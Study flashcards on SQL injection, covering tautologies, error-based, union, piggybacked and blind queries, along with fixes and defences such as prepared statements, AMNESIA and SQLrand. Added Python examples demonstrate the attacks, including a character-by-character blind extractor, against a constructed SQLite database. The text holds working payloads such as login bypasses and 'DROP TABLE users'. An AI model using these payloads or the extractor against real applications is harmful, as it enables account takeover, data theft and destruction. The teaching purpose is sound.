web attacks - sql injections Flashcards
what is sql
standard language for interacting with databases, very common with web applications
what is it used for in web applications
authentication: the DB stores users and passwords
most commonly: application data storage
how is it used in desktops and server apps
Email clients/servers
Photo applications, media servers
Custom database clients
Application data caches
what are network injections
usually considered the bigger risk
can be triggered by unknown, remote users
the network is a gateway crossing physical boundaries
the risk is greatest for privileged servers
what are local injections
local users can only deny access to themselves
desktop apps run as plain users, so they put only the user's own data at risk
however:
drive-by exploits attack locally, and insider threats are a growing concern
Typical Setting for Attacks
1) presentation tier
2) logic tier
3) storage tier
what happens in the presentation tier
the browser sends its HTTP GET request to the victim site
renders the html that is returned from the logic tier
what happens in the logic tier
loads, compiles and executes index.asp, which builds the sql query
sends html to the browser after the data is returned from the storage tier
what happens in the storage tier
executes the sql and returns the data
what does this code accomplish?
$username = $HTTP_POST_VARS['username'];   // raw POST input, not escaped
$password = $HTTP_POST_VARS['passwd'];
$query = "SELECT * FROM logintable WHERE user = '"
       . $username . "' AND pass = '" . $password . "'";   // built by string concatenation
…
$result = mysql_query($query);
if (!$result)          // false only on a SQL error; a SELECT with zero rows still returns a result
    die_bad_login();
this guarantees login: the unescaped input becomes part of the SQL text, so an attacker can choose a username/password that makes the query succeed!
write injected input that guarantees login
▶ User name: bob' OR user<>'bob
▶ Password: foo' OR pass<>'foo
SELECT * FROM logintable WHERE user = 'bob' OR user<>'bob' AND pass = 'foo' OR pass<>'foo'
(AND binds tighter than OR, so this reads user='bob' OR (user<>'bob' AND pass='foo') OR pass<>'foo', which is true for every row)
what is an in-band fix
filtering
what does in-band fix: filtering do?
use filtering to escape blacklisted characters (e.g., quotes) before they are placed into the query text
php and mysql have functions to help do this (e.g., mysql_real_escape_string())
what is an out-of-band fix
Prepared statements
what does out-of-band fix: prepared statements do?
uses a prepared query with parameter placeholders
parameter values are sent separately and safely substituted into the sql statement, so they are never parsed as sql
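The PHP login card, the tautology payload and both fixes, as an added Python example (this is not code from the original page): the same concatenation against an in-memory SQLite table, beside the in-band fix (quote escaping) and the out-of-band fix (placeholders). The table and its two users are constructed for the example.

```python
import sqlite3

def make_db():
    """Constructed stand-in for the page's logintable (in-memory SQLite, two users)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE logintable (user TEXT, pass TEXT)")
    db.executemany("INSERT INTO logintable VALUES (?, ?)",
                   [("bob", "s3cret"), ("alice", "hunter2")])
    return db

def build_vulnerable_query(username, password):
    """Same construction as the PHP card: raw input concatenated into the SQL text."""
    return ("SELECT * FROM logintable WHERE user = '" + username +
            "' AND pass = '" + password + "'")

def login_vulnerable(db, username, password):
    """Accepts the login if the concatenated query matches any row."""
    rows = db.execute(build_vulnerable_query(username, password)).fetchall()
    return len(rows) > 0

def escape(value):
    """In-band fix: double every single quote so it stays inside the literal
    (the SQL-standard rule, which SQLite uses; MySQL's
    mysql_real_escape_string() uses a backslash instead)."""
    return value.replace("'", "''")

def login_filtered(db, username, password):
    """Concatenation kept, but the quote character is escaped first."""
    query = build_vulnerable_query(escape(username), escape(password))
    return len(db.execute(query).fetchall()) > 0

def login_prepared(db, username, password):
    """Out-of-band fix: placeholders in the SQL, values handed to the driver
    separately, so quotes and OR in the input are never parsed as SQL."""
    rows = db.execute("SELECT * FROM logintable WHERE user = ? AND pass = ?",
                      (username, password)).fetchall()
    return len(rows) > 0

# The flashcard payload: user name bob' OR user<>'bob, password foo' OR pass<>'foo
TAUTOLOGY_USER = "bob' OR user<>'bob"
TAUTOLOGY_PASS = "foo' OR pass<>'foo"

if __name__ == "__main__":
    db = make_db()
    print(build_vulnerable_query(TAUTOLOGY_USER, TAUTOLOGY_PASS))
    print("vulnerable:", login_vulnerable(db, TAUTOLOGY_USER, TAUTOLOGY_PASS))
    print("filtered:  ", login_filtered(db, TAUTOLOGY_USER, TAUTOLOGY_PASS))
    print("prepared:  ", login_prepared(db, TAUTOLOGY_USER, TAUTOLOGY_PASS))
```

Only the vulnerable variant logs the attacker in. Note that escaping only protects quoted string literals; a numeric parameter concatenated without quotes (as the pin in the later cards) gets no benefit from it, which is one reason the prepared form is preferred.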
what is an alternative fix to filtering and prepared statements
ORM and LINQ
what is ORM used for?
Use Object-Relational Mapping (ORM) for structured DB access
what does orm stand for
Object-Relational Mapping
what is LINQ used for
Use LINQ in .NET to interact with databases safely
what is a more general out-of-band solution besides prepared statements
A more general "out-of-band" solution is to use embedded programming language support for databases
what should we examine when trying to classify sql injections
▶ Route – where injection happens
▶ Motive — what it aims to achieve
▶ SQL code — the form of SQL injected
name the different types of injection routes
▶ User input e.g., web forms via HTTP GET or POST
▶ Cookies used by web apps to build queries
▶ Server variables logged by web apps (e.g., HTTP headers)
▶ Second-order injections, where the injection (e.g., input stored earlier) is separated in time from the attack
give me examples of a primary motive
▶ Extracting data
▶ Adding or modifying data
▶ Mounting a denial-of-service attack
▶ Bypassing authentication
▶ Executing arbitrary commands
give me examples of an auxiliary motive
finding injectable parameters
finding database schema
database server fingerprinting
escalating privilege at the database level
forms of sql code injected
tautologies
illegal or incorrect queries
union query
piggybacked queries
inference pairs
stored procedures or other dbms features
the injection may use alternate encodings to try to defeat sanitization routines that don't interpret them (e.g., char(120) instead of x)
what is a tautology
inject code into condition statements so they always evaluate to true
give example of tautology query
SELECT accounts FROM users WHERE
login = '' OR 1=1 -- AND pin =
why is blacklisting tautologies difficult
▶ Many ways of writing them: 1>0, 'x' LIKE 'x', etc.
▶ Quasi-tautologies: conditions that are true almost every time, e.g., RAND()>0.01
what does an illegal / incorrect query do
causes a run-time error, hoping to learn information from the error response
give example of incorrect / illegal query
SELECT accounts FROM users WHERE
login = '' AND pin = convert(int, (select top 1 name from
sysobjects where xtype = 'u'))
explain how illegal/incorrect query works
▶ Assumes MS SQL Server
▶ sysobjects is a server table of metadata
▶ Attempts to find first user table
▶ Converts name into an integer → Runtime error
what is sysobjects
a server table of metadata
what does this error tell the attacker:
Microsoft OLE DB Provider for SQL Server (0x80040E07)
Error converting nvarchar value 'CreditCards'
to a column of data type int
▶ MS SQL Server is running
▶ The first user-defined table is called CreditCards
what is a union query
injecting a second query using UNION
give example of union query
SELECT accounts FROM users WHERE
login = '' UNION SELECT cardNo FROM CreditCards WHERE
acctNo = 10032 -- AND pin =
what is the effect of this union query?
SELECT accounts FROM users WHERE
login = '' UNION SELECT cardNo FROM CreditCards WHERE
acctNo = 10032 -- AND pin =
▶ Suppose there are no tuples with login=’’
▶ May reveal cardNo for account 10032
give example of piggyback query
SELECT accounts FROM users WHERE
login = 'doe'; drop table users -- ' AND pin
explain what this piggyback query does?
SELECT accounts FROM users WHERE
login = 'doe'; drop table users -- ' AND pin
▶ Database parses second command after ;
▶ Executes second query, deleting users table
▶ Some servers don’t require the ; character!
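The union and piggyback cards above, run end to end as an added Python example (not code from the original page). The users and CreditCards tables and their rows are constructed for the example; the target is an in-memory SQLite database through Python's sqlite3 driver, which matters for the piggyback case because the driver, not the database, decides whether a second statement after ; is executed.

```python
import sqlite3

def make_db():
    """Constructed sample schema from the flashcards (users, CreditCards), in memory."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (login TEXT, pin INTEGER, accounts TEXT)")
    db.execute("CREATE TABLE CreditCards (acctNo INTEGER, cardNo TEXT)")
    db.execute("INSERT INTO users VALUES ('doe', 1234, 'ACC-001')")
    db.execute("INSERT INTO CreditCards VALUES (10032, '4111111111111111')")
    return db

def accounts_for(db, login, pin):
    """Vulnerable query-generation point: login is quoted, pin is numeric,
    both concatenated straight from the request."""
    query = ("SELECT accounts FROM users WHERE login = '" + login +
             "' AND pin = " + pin)
    return [row[0] for row in db.execute(query)]

# Union: the left SELECT matches nothing (login = ''), so the result set is the
# attacker's SELECT; the comment discards the rest of the original WHERE clause.
UNION_PAYLOAD = "' UNION SELECT cardNo FROM CreditCards WHERE acctNo = 10032 -- "

# Piggyback: terminate the statement and append a second one.
PIGGYBACK_PAYLOAD = "doe'; DROP TABLE users -- "

def users_table_exists(db):
    return db.execute(
        "SELECT count(*) FROM sqlite_master WHERE name = 'users'").fetchone()[0] == 1

def try_piggyback(db):
    """Stacked statement through cursor.execute().
    Returns (driver_refused, users_table_still_exists)."""
    try:
        accounts_for(db, PIGGYBACK_PAYLOAD, "0")
        refused = False
    except (sqlite3.Warning, sqlite3.ProgrammingError):
        refused = True   # sqlite3: "You can only execute one statement at a time."
    return refused, users_table_exists(db)

def try_piggyback_executescript(db):
    """Same payload through executescript(), which does run stacked statements.
    Returns whether the users table survived."""
    query = ("SELECT accounts FROM users WHERE login = '" + PIGGYBACK_PAYLOAD +
             "' AND pin = 0")
    db.executescript(query)
    return users_table_exists(db)

if __name__ == "__main__":
    db = make_db()
    print("legit:   ", accounts_for(db, "doe", "1234"))
    print("union:   ", accounts_for(db, UNION_PAYLOAD, "0"))
    print("execute: ", try_piggyback(db))
    print("script:  ", try_piggyback_executescript(make_db()))
```

The union payload returns the card number even though no user has an empty login. The piggybacked DROP is refused by cursor.execute() but executed by executescript(); drivers and servers that accept multiple statements per call (the "some servers don't require the ;" caveat is about the server side) give the attacker the second query for free.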
what is an inference pair
even if the error response is not visible, we can gather information by observing subtle differences between the outputs for a pair of injected conditions
what are the two techniques for inference pairs
blind injection
timing attack
with unlimited query access, these techniques allow automated differential analysis
what is a blind injection
it exploits visible differences in responses (e.g., a normal page vs. an error page)
what is a timing attack
it exploits differences in response time based on boolean conditions (e.g., using WAITFOR DELAY on MS SQL Server)
how to use blind injection to discover if the login parameter is injectable
Step 1: Always true
login = 'legalUser' and 1=1 -- '
Step 2: Always false
login = 'legalUser' and 1=0 -- '
if step 1 behaves like a normal login for legalUser and step 2 does not, the injected condition was evaluated, so the parameter is injectable
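The two-step injectability test and the "automated differential analysis" it enables, as an added Python example (not code from the original page). The application is a constructed oracle that answers only "welcome" or "invalid" and swallows SQL errors, so the illegal-query trick would reveal nothing; the blind attacker instead asks one yes/no question per character via substr() on a scalar subquery. Sample tables and rows are constructed; the timing variant is not shown.

```python
import sqlite3
import string

def make_db():
    """Constructed sample data (in-memory SQLite)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (login TEXT, pin INTEGER, accounts TEXT)")
    db.execute("CREATE TABLE CreditCards (acctNo INTEGER, cardNo TEXT)")
    db.execute("INSERT INTO users VALUES ('legalUser', 1234, 'ACC-001')")
    db.execute("INSERT INTO CreditCards VALUES (10032, '4111111111111111')")
    return db

def page(db, login, pin):
    """The only oracle the attacker sees: 'welcome' or 'invalid'.
    Errors are hidden, so no schema leaks through error messages."""
    query = ("SELECT accounts FROM users WHERE login = '" + login +
             "' AND pin = " + pin)
    try:
        rows = db.execute(query).fetchall()
    except sqlite3.Error:
        return "invalid"
    return "welcome" if rows else "invalid"

def is_injectable(db, legal_user):
    """Step 1 / step 2 from the card: an always-true and an always-false
    suffix. The -- comment removes the pin check, so the two responses differ
    only if the injected condition was evaluated."""
    always_true = page(db, legal_user + "' AND 1=1 -- ", "0")
    always_false = page(db, legal_user + "' AND 1=0 -- ", "0")
    return always_true == "welcome" and always_false == "invalid"

ALPHABET = string.ascii_letters + string.digits + "_"

def extract(db, legal_user, scalar_subquery, max_len=40):
    """Automated differential analysis: recover the subquery's value one
    character at a time, one true/false query per candidate character."""
    secret = ""
    for pos in range(1, max_len + 1):
        for ch in ALPHABET:
            probe = (f"{legal_user}' AND substr(({scalar_subquery}), {pos}, 1)"
                     f" = '{ch}' -- ")
            if page(db, probe, "0") == "welcome":
                secret += ch
                break
        else:
            return secret   # no candidate matched: end of the value
    return secret

if __name__ == "__main__":
    db = make_db()
    print("injectable:", is_injectable(db, "legalUser"))
    print(extract(db, "legalUser",
                  "SELECT name FROM sqlite_master WHERE type = 'table' AND name <> 'users'"))
    print(extract(db, "legalUser", "SELECT cardNo FROM CreditCards WHERE acctNo = 10032"))
```

The first extraction recovers a table name from the catalogue (an auxiliary motive: finding the schema), the second the card number (the primary motive); on MS SQL Server the catalogue query would target sysobjects instead. The cost is roughly one request per candidate character per position, which is why the cards note that unlimited access makes this fully automatable.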
what is a stored procedure
custom subroutines, stored in the database, that provide support for additional operations
what is a risk of stored procedures
if inputs are improperly sanitised, a stored procedure can itself be vulnerable to sql injection
why are out-of-band fixes preferred
they reduce the risk of sql injection: data is passed separately from the sql text, so it is never parsed as sql
how to repair an sqli vulnerability
▶ Filtering to sanitize inputs
▶ Prepared queries (aka parameterized queries)
Both methods are server-side, so it is better to use database driver libraries that
abstract away from the underlying DBMS
what is dangerous about the xp_cmdshell provided by Microsoft SQL Server
allows execution of os commands
Mitigation:
▶ Since SQL Server 2005, this is disabled by default.
▶ But DB administrators can re-enable it.
▶ Worse, an attacker with SQLi access might be able to enable it
Lesson: Access control and passwords are critical inside the database!
How Do I Prevent SQLi Vulnerabilities BEFORE DEPLOYMENT
use programming-language support for databases or object-relational mapping
manual code review or automatic static analysis
How Do I Prevent SQLi Vulnerabilities DURING TESTING OR DEPLOYMENT
pen testing tools
instrumented code
How Do I Prevent SQLi Vulnerabilities AFTER TESTING OR DEPLOYMENT
wait until after deployment, then manually investigate
use dynamic remediation plus alarms (application firewall or specialised techniques)
what is the idea behind Static Prevention: Automated Analysis
use static code analysis to warn programmers about, prohibit, or fix vulnerable code
what are the techniques used for Static Prevention: Automated Analysis
Detect suspicious code patterns, e.g., dynamic query construction
Use static taint analysis to detect data-flows from input parameters to queries
What is the use of AMNESIA in static analysis
use static analysis as a preprocessing step to create a dynamic detection tool
how does AMNESIA work?
- Find SQL query-generation points in code
- Build an SQL-query model as an NDFA which models the SQL grammar; transition labels are tokens
- Instrument the application to call a runtime monitor
- If the monitor detects a violation of the state machine, it triggers an error, preventing the SQL query
what is an sql injection
an attack that exploits a security vulnerability in application software by supplying input that ends up interpreted as sql
Dynamic Prevention: SQLrand
use instruction-set randomization to change the sql language dynamically, so that it uses
opcodes/keywords that attackers can't easily guess
describe State Machine for SQL Production
Variable β: Matches any string in SQL grammar
▶ Spots violation in injectable parameters
▶ Aborts query if model not in accepting state
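The AMNESIA runtime monitor (query model with β slots, built from the query-generation point, checked before the query is sent) and SQLrand (randomized keywords de-randomized by a proxy), as one added Python example that is not code from the original page or from either tool. Both are simplified: the AMNESIA model here is a flat token sequence rather than an NDFA, and the SQLrand key is a constructed digit string appended to keywords. The tokenizer, keyword list and the query template are assumptions made for the example.

```python
import re
import secrets

# Shared tokenizer: string literal ('' escapes a quote), number, word
# (keyword or identifier), two-char operator, or any other single character.
TOKEN_RE = re.compile(
    r"'(?:[^']|'')*'|\d+|[A-Za-z_][A-Za-z_0-9]*|<>|<=|>=|!=|--|\|\||\S")

def tokenize(sql):
    return TOKEN_RE.findall(sql)

def is_literal(tok):
    return tok.isdigit() or (len(tok) >= 2 and tok[0] == "'" and tok[-1] == "'")

# ---- AMNESIA-style monitor -------------------------------------------------
BETA = "__BETA__"   # the page's β: the slot that one input variable fills

def build_model(template):
    """Static step: tokenize the query as written at the query-generation point."""
    return tokenize(template)

def conforms(model, query):
    """Runtime step: the generated query must walk the model token by token,
    and each β must be consumed by exactly one literal. Injected keywords,
    operators or a second statement change the token sequence -> not accepted."""
    toks = tokenize(query)
    if len(toks) != len(model):
        return False
    for expect, got in zip(model, toks):
        if expect == BETA:
            if not is_literal(got):
                return False
        elif expect.upper() != got.upper():
            return False
    return True

MODEL = build_model(
    "SELECT accounts FROM users WHERE login = __BETA__ AND pin = __BETA__")

def guarded_query(login, pin):
    """The app still concatenates (as on the cards); the monitor decides
    whether the result may be sent. Returns the query, or None if aborted."""
    query = ("SELECT accounts FROM users WHERE login = '" + login +
             "' AND pin = " + pin)
    return query if conforms(MODEL, query) else None

# ---- SQLrand-style keyword randomization ------------------------------------
KEYWORDS = {"SELECT", "FROM", "WHERE", "AND", "OR", "NOT", "UNION", "INSERT",
            "INTO", "VALUES", "UPDATE", "SET", "DELETE", "DROP", "TABLE", "LIKE"}

def make_key():
    """Per-process secret suffix; digits only so keywords stay single word tokens."""
    return str(secrets.randbelow(10**9)).zfill(9)

def sqlrand_query(login, pin, key):
    """Application side: its own keywords carry the key; input is concatenated raw."""
    return (f"SELECT{key} accounts FROM{key} users WHERE{key} login = '" + login +
            f"' AND{key} pin = " + pin)

def derandomize(query, key):
    """Proxy side: strip the key from the app's keywords. A keyword without the
    key can only have come from the input, so the query is rejected (None)."""
    out = []
    for tok in tokenize(query):
        upper = tok.upper()
        if upper.endswith(key) and upper[:-len(key)] in KEYWORDS:
            out.append(tok[:-len(key)])
        elif upper in KEYWORDS:
            return None
        else:
            out.append(tok)
    return " ".join(out)

if __name__ == "__main__":
    key = make_key()
    for login in ("doe", "' OR 1=1 -- ", "' UNION SELECT cardNo FROM CreditCards -- "):
        print(repr(login), "amnesia:", guarded_query(login, "1234") is not None,
              "sqlrand:", derandomize(sqlrand_query(login, "1234", key), key) is not None)
```

The structural monitor also rejects a legitimate name containing an apostrophe unless the application escapes it as '' (then it is a single literal and passes), so it does not replace escaping or prepared statements. Keyword randomization stops every injection that needs a keyword, but an input that gets by on operators and a comment alone (for instance ' || 1 -- ) carries no keyword and passes the proxy, while the token-sequence check still rejects it.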